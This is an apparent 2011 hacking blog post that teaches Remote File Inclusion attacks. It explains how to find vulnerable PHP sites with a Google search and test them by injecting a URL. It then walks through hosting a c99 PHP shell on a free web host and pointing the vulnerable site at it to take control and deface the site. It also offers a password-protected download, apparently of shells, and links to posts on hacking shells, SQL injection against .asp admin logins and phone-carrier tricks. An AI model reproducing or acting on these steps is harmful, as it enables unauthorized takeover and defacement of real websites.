Posted by Hacker Pilu Saturday, July 09, 2011
A Remote File Inclusion vulnerability is where we trick the web server in to putting our file (file uploader / php shell) in to the web page. It then parses our PHP script and we then have full control over the server. The exploit works because when a website calls another page to be displayed except, we edit the url so that the website thinks our shell is the page to display.
Normally, I'm against stuff like this. I believe people should find their own vulnerable sites. But, for the sake of this paper, i will show you how we can use google to get us vulnerable sites.
We will query google like so:
This query asks google to give us any page with index.php?page= in the url. If we look at it, we can see that 'page' is calling up whatever is after the equals sign. This is where the actual exploit lies. A good test to see if a website is actually vulnerable is to enter
http://www.google.com after the equal sign.
It is not necessary that every site will work look above statement....Only those will redirect to google,which having the security holes...
If the full google.com website appears on the page, the websiteis vulnerable. If not, keep looking. To exploit the vulnerability we must first look at the following example of a RFI:
this is an example only,There is no such sites or file....
1. Get a free host website (like ByetHost or free webs)
2. Put a PHP shell (c99) in text form on the site
3. Insert the path to the shell in the vulnerable hosts URL, like the example above.
4.You can then proceed to deface the site etc.
Download | 1.46 MB
Password = hackintruths
Password = hackintruths
Hacker PiluThis is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
Top 103 Shells For HackingMost popular 103 Shells For Hacking Shell List: C99Shell v. 1.0 beta (5.02.2005) PHP b374k PHP b374k-mini-shell PHP Cyber...
Reset Samsung Mobile Tracker CodeThese Code Reset All Code In Your Samsung Mobile(Any Model) Samsung Tracker Code Also Reset By These Codes If You Forget Your Code...
Hack / Bypass .asp sites using SQL InjectionHack any .asp sites with SQL Injection attack. 1st, Open Google and search for adminlogin.asp or admin\login.asp 2nd, Open any searc...
Get upto 2gb Graphics Memory without any SoftwareGet upto 2gb Graphics memory Just do this steps and you will get upto 2 gb graphics memory. Run >> regedit.exe >> find H...
WEAKERTHAN - Another OS For HackersWeakerthan 3.6 OS for Hackers Most of the hackers would have heard about Backtrack. Weakerthan is another Linux based pentesting...
How to Unlock your CellphoneWhat are Unlocked Cellphones? and Why anybody would want to Unlock it? An Unlocked Cellphone is one that can be used on all networks ...
Get upto 100 MBPS Internet speed [Funny Trick]Today I will show you how to Fool your friends. They should think that you have internet connection up to 100 MBPS speed. 1 st ,...
Docomo free Hello-Tune HackGet Free Hello-Tune for 7days abselutly free...!!! just Dial *678*777# after the above no. Dialled you will get message that "...
Reliance Free Calling TrickFree Registration Process :- Step 1: Call 563635 (tollfree) and press 1, to register.End the call after hearing confirmation. Step 2:...
Google Parent Directory Ultimate wayLook for Appz in Parent Directory intext:"parent directory" intext:"[EXE]" intext:"parent directory"...
- email hacking
- Facebook App
- game maker
- Help Desk Answer
- Legit or Scam
- Official Notices
- speed up
- SQL Attack
- Tips and Tricks
- win rar
- windows 7
- Windows XP